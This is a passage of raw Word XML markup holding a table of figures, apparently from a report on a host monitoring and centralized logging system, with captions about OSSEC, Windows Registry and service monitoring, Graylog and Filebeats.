        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF FIGURES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB2F32" w:rsidRDefault="00FB2F32" w:rsidP="00FB2F32">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B94D16" w:rsidRDefault="00FB2F32">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc485303760" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.1: OSSEC Processes in a “Server-Agent” Installation</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303760 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</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61" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.2 Cell data type segments in Registry hive.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303761 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</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62" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.3 Example of cell indexes</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303762 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</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63" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.4 Configuration Manager implements a strategy for handling noncontiguous memory buffer problems.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303763 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</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64" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.5 Each Windows service is stored as an entry key in the SCM database Registry location</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303764 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</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65" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.6 Each service entry key stores many Registry values that specify its information</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303765 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</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66" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.7 Graylog working model.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303766 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</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67" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.8 The correlation between Graylog server and Graylog Collector Sidecar.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303767 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</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68" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.9 Example configuration of Graylog Collector Sidecar.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303768 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</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69" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.10 Graylog servers and Elasticsearch servers deployed in Cluster mode.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303769 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</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70" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.11 Example of a dashboard.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303770 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</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71" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.12 Messages are processed in stream.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303771 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</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72" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.1 Registry Monitor architecture diagram</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303772 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</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73" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.2 Mechanism for detecting change in registry</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303773 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</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74" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.3 Service Monitor Architecture</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303774 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</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75" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.4 NotifyServiceStatusChange and APC</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303775 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</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76" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.5 Distributed Log Collector Hardware architecture</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303776 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</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77" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.6 Centralized Log Storage System architecture</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303777 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</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78" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.7 Sentry is executed using Powershell and Shellscript</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303778 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</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79" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.1 Create an input for Graylog server using Beats framework.</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303779 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>88</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80" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.2 Graylog input channel for receiving data from DLCH via Filebeats</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303780 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</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81" w:history="1">
        <w:r w:rsidR="00B94D16" w:rsidRPr="007D3DBA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.3 Configure input and output channel for each DLCH’s collector</w:t>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485303781 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00B94D16">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</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82" w:history="1">
